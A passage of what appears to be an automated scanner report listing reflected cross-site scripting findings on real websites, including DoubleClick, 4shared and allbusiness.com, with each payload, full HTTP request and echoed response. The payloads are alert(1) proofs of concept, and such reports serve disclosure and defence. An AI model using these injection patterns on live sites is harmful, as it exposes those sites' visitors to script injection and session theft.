Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 02 Apr 2011 12:59:52 GMT
Vary: Accept-Encoding
Expires: Sat, 02 Apr 2011 12:59:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7244

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
RtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-406387893378091220aba"-alert(1)-"6d10011bb3f&adurl=http%3a%2f%2fwww.webex.com/lpintl/us/banner/lets-get-together.html%3FTrackID%3D1024433");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowsc
...[SNIP]...

6.4. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27 [num parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.Google.com/B5219922.27

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d09c"-alert(1)-"9ece5572fb6 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N1260.Google.com/B5219922.27;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BiFx0Dh2XTaX3Ic7ilQf6iqHVCPux5J4C25fY3hvAjbcB4JuQAhABGAEgvs7lDTgAUJT5_pcHYMkGoAHN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=16d09c"-alert(1)-"9ece5572fb6&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-4063878933780912&adurl=;ord=879784873? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998819&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcapec-86-dork-xss-cross-site-scripting-examples.html&dt=1301749042824&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749042836&frm=0&adk=1607234649&ga_vid=1243467471.1301749043&ga_sid=1301749043&ga_hid=1328169759&ga_fc=0&u_tz=-300&u_his=21&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=16&xpc=E2Nhb6Q087&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 02 Apr 2011 12:58:24 GMT
Vary: Accept-Encoding
Expires: Sat, 02 Apr 2011 12:58:24 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7261

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
A7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=16d09c"-alert(1)-"9ece5572fb6&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fwww.webex.com/lpintl/us/banner/free-easy-webex-together.html%3FTrackID%3D1024048");
var fscUrl = url;
var fsc
...[SNIP]...

6.5. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27 [sig parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.Google.com/B5219922.27

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e478"-alert(1)-"cf73551e9d0 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N1260.Google.com/B5219922.27;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BiFx0Dh2XTaX3Ic7ilQf6iqHVCPux5J4C25fY3hvAjbcB4JuQAhABGAEgvs7lDTgAUJT5_pcHYMkGoAHN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ1e478"-alert(1)-"cf73551e9d0&client=ca-pub-4063878933780912&adurl=;ord=879784873? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998819&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcapec-86-dork-xss-cross-site-scripting-examples.html&dt=1301749042824&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749042836&frm=0&adk=1607234649&ga_vid=1243467471.1301749043&ga_sid=1301749043&ga_hid=1328169759&ga_fc=0&u_tz=-300&u_his=21&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=16&xpc=E2Nhb6Q087&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 02 Apr 2011 12:59:10 GMT
Vary: Accept-Encoding
Expires: Sat, 02 Apr 2011 12:59:10 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7244

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ1e478"-alert(1)-"cf73551e9d0&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fwww.webex.com/lpintl/us/banner/lets-get-together.html%3FTrackID%3D1024433");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque
...[SNIP]...

6.6. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.Google.com/B5219922.27

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de85f"-alert(1)-"20e7d43f519 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N1260.Google.com/B5219922.27;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=lde85f"-alert(1)-"20e7d43f519&ai=BiFx0Dh2XTaX3Ic7ilQf6iqHVCPux5J4C25fY3hvAjbcB4JuQAhABGAEgvs7lDTgAUJT5_pcHYMkGoAHN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-4063878933780912&adurl=;ord=879784873? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998819&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcapec-86-dork-xss-cross-site-scripting-examples.html&dt=1301749042824&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749042836&frm=0&adk=1607234649&ga_vid=1243467471.1301749043&ga_sid=1301749043&ga_hid=1328169759&ga_fc=0&u_tz=-300&u_his=21&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=16&xpc=E2Nhb6Q087&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 02 Apr 2011 12:57:17 GMT
Vary: Accept-Encoding
Expires: Sat, 02 Apr 2011 12:57:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7244

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
l = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3add/f/1b7/%2a/c%3B235704433%3B0-0%3B0%3B59487875%3B3454-728/90%3B40121456/40139243/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=lde85f"-alert(1)-"20e7d43f519&ai=BiFx0Dh2XTaX3Ic7ilQf6iqHVCPux5J4C25fY3hvAjbcB4JuQAhABGAEgvs7lDTgAUJT5_pcHYMkGoAHN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRl
...[SNIP]...

6.7. http://www.4shared.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f45e'-alert(1)-'47a61c2d0ed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico3f45e'-alert(1)-'47a61c2d0ed HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.4shared.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 /favicon.ico3f45e'-alert(1)-'47a61c2d0ed
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1459F926DDE8BF905A4995BCC43D1519.dc328; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sat, 02 Apr 2011 13:25:12 GMT
Content-Length: 41850


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
eof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/favicon.ico3f45e'-alert(1)-'47a61c2d0ed',
remember : false


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

6.8. http://www.4shared.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15164"-alert(1)-"dd8c6187af5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico15164"-alert(1)-"dd8c6187af5 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.4shared.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 /favicon.ico15164&quot;-alert(1)-&quot;dd8c6187af5
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=61CB2DAE3C41A134AF4364A8D421487B.dc330; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sat, 02 Apr 2011 13:25:11 GMT
Content-Length: 41151


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/favicon.ico15164"-alert(1)-"dd8c6187af5";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

6.9. http://www.aboutus.org/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aboutus.org
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2e07"><script>alert(1)</script>fd9b551f005 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icod2e07"><script>alert(1)</script>fd9b551f005 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.aboutus.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.1
ETag: "64d7e41dd2260249cada85edd9738f53"
X-Runtime: 121
Content-Length: 13392
Set-Cookie: logged_in=false; path=/
Set-Cookie: _aboutus_session_key=BAh7BzoPc2Vzc2lvbl9pZCIlMTY5MTgwMTgzNDlmM2ZmZGJkNzIwNmY4ZGRjOTlhNjEiDWFiX2luZGV4aSs%3D--b35a502024b9ad39567b1317c2a187f617c7104f; path=/; expires=Mon, 02-Apr-2012 13:43:11 GMT; HttpOnly
Cache-Control: max-age=0, public
X-Au-Rails-Sha1: 65ba32a
Server: nginx/0.8.54 + Phusion Passenger 3.0.1 (mod_rails/mod_rack)
X-node-id: rogue
Set-Cookie: SERVERID=rogue; path=/


<!doctype html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<meta name="description" content="Favicon.Icod2e07"><Script>Alert(1)</Script>Fd9b551f005 - Learn from the experts and community at AboutUs.org" />
...[SNIP]...

6.10. http://www.allbusiness.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.allbusiness.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e888a"-alert(1)-"bb943823954 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /e888a"-alert(1)-"bb943823954 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.allbusiness.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 The page you requested could not be found.
Date: Sat, 02 Apr 2011 13:38:49 GMT
Server: Apache
Set-Cookie: JSESSIONID=2a30daa2c5964f7e7295;path=/
Set-Cookie: SERVERID=web6;path=/
Set-Cookie: IIA=%2D3;expires=Sun, 03-Apr-2011 13:38:49 GMT;path=/
Set-Cookie: IIA=%2D2;expires=Sun, 03-Apr-2011 13:38:49 GMT;path=/
Set-Cookie: PAGEID=594366435;path=/
Set-Cookie: TS=2011%2D04%2D02%2008%3A38%3A49%2E447;path=/
Set-Cookie: COMPONENTID=0;expires=Mon, 25-Mar-2041 13:38:49 GMT;path=/
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 47445

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Content
...[SNIP]...
ot found, but...";
       s_ab.prop10 = "3471360";
       s_ab.prop11 = "";
       s_ab.prop12 = "landingpageobject";
       s_ab.prop13 = "AllBusiness.com";
       s_ab.prop14 = "";
       s_ab.prop15 = "www.allbusiness.com/e888a"-alert(1)-"bb943823954";
       s_ab.prop16 = "";
       s_ab.prop17 = "";
       s_ab.prop18 = "";
       s_ab.prop19 = "";
       s_ab.prop20 = "";
       s_ab.prop21 = "";
       s_ab.prop22 = "";
       s_ab.prop23 = "";
       s_ab.prop24 = "";
       s_ab.p
...[SNIP]...

6.11. http://www.allbusiness.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.allbusiness.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c535f"><img%20src%3da%20onerror%3dalert(1)>8e7e657d535 was submitted in the REST URL parameter 1. This input was echoed as c535f"><img src=a onerror=alert(1)>8e7e657d535 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c535f"><img%20src%3da%20onerror%3dalert(1)>8e7e657d535 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.allbusiness.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 The page you requested could not be found.
Date: Sat, 02 Apr 2011 13:38:47 GMT
Server: Apache
Set-Cookie: JSESSIONID=ac30c795cbb9533a1273;path=/
Set-Cookie: SERVERID=web7;path=/
Set-Cookie: IIA=%2D3;expires=Sun, 03-Apr-2011 13:38:47 GMT;path=/
Set-Cookie: IIA=%2D2;expires=Sun, 03-Apr-2011 13:38:47 GMT;path=/
Set-Cookie: PAGEID=594366418;path=/
Set-Cookie: TS=2011%2D04%2D02%2008%3A38%3A47%2E92;path=/
Set-Cookie: COMPONENTID=0;expires=Mon, 25-Mar-2041 13:38:47 GMT;path=/
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 47481

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Content
...[SNIP]...
<form method="post" id="formWrapper_1" name="formWrapper_1" action="https://www.allbusiness.com/c535f"><img src=a onerror=alert(1)>8e7e657d535?server=web7&sid=ac30c795cbb9533a1273">
...[SNIP]...

6.12. http://www.allvoices.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.allvoices.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5dd6"><script>alert(1)</script>e219c4ca2fb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoe5dd6"><script>alert(1)</script>e219c4ca2fb HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.allvoices.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:33:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.5
X-QueryCount: 2
X-Runtime: 17ms
X-QueryRuntime: 0.00090
Cache-Control: no-cache
Set-Cookie: _T_=c2xmzossd34irl5oaei3kdcgc; path=/; expires=Sun, 03 Apr 2011 01:33:36 GMT
Set-Cookie: page_url=http%3A%2F%2Fwww.allvoices.com%2Ffavicon.icoe5dd6%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ee219c4ca2fb; path=/
Set-Cookie: masala_session_id=cc123cc7f9309ecd4fb448f3e3eaa04c; path=/
Content-Length: 27741
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<meta property="og:url" content="http://www.allvoices.com/favicon.icoe5dd6"><script>alert(1)</script>e219c4ca2fb"/>
...[SNIP]...

6.13. http://www.answerbag.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.answerbag.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1dcf8'><script>alert(1)</script>60b16937f0b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico1dcf8'><script>alert(1)</script>60b16937f0b HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.answerbag.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 13:24:23 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a PHP/5.2.5
X-Powered-By: PHP/5.2.5
Set-Cookie: PHPSESSID=37e025c3a2f50dca596f6e4370459fb4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en-us

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org
...[SNIP]...
<meta property='og:url' content='http://www.answerbag.com/favicon.ico1dcf8'><script>alert(1)</script>60b16937f0b' />
...[SNIP]...

6.14. http://www.beyond.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beyond.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload e5463%20style%3dx%3aexpression(alert(1))%20fd7a74860e was submitted in the REST URL parameter 1. This input was echoed as e5463 style=x:expression(alert(1)) fd7a74860e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /favicon.icoe5463%20style%3dx%3aexpression(alert(1))%20fd7a74860e HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.beyond.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404
Cache-Control: private
Content-Length: 30033
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: PORTAL=PARTNER=Beyond%2Ecom&NEWUSERSITE=&DIDIPLKUP=Y&USERSTATE=TEXAS&HTTPREFERRER=&USERGID=913263227153426286&USERCOUNTRY=US; expires=Sun, 01-Apr-2012 04:00:00 GMT; path=/
Set-Cookie: Visitor=NewSessionID=7A3FD486%2D48A5%2D4EA0%2DB271%2D6C91FED7EA92; path=/
Set-Cookie: ASPSESSIONIDAQTRQBAR=KNFHENGDPLLKNBNCIIEGPDBD; path=/
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:03:54 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta http-equ
...[SNIP]...
6124&r_partnersitename=Beyond.com&t_pgid=446235606103476794&t_sn=/common/error/checkurl.asp&t_httph=www.beyond.com&t_httpurl=/common/error/checkurl.asp&t_httpqs=404;http://www.beyond.com:80/favicon.icoe5463 style=x:expression(alert(1)) fd7a74860e&t_sgid=465502406305451416&t_ws=COLO-WEB01&t_ugid=913263227153426286&f_ip=173.193.214.243&ud=>
...[SNIP]...

6.15. http://www.biblegateway.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.biblegateway.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9cd89"><script>alert(1)</script>b47e0ff56e9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico9cd89"><script>alert(1)</script>b47e0ff56e9 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.biblegateway.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.54
Date: Sat, 02 Apr 2011 13:35:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.1.6
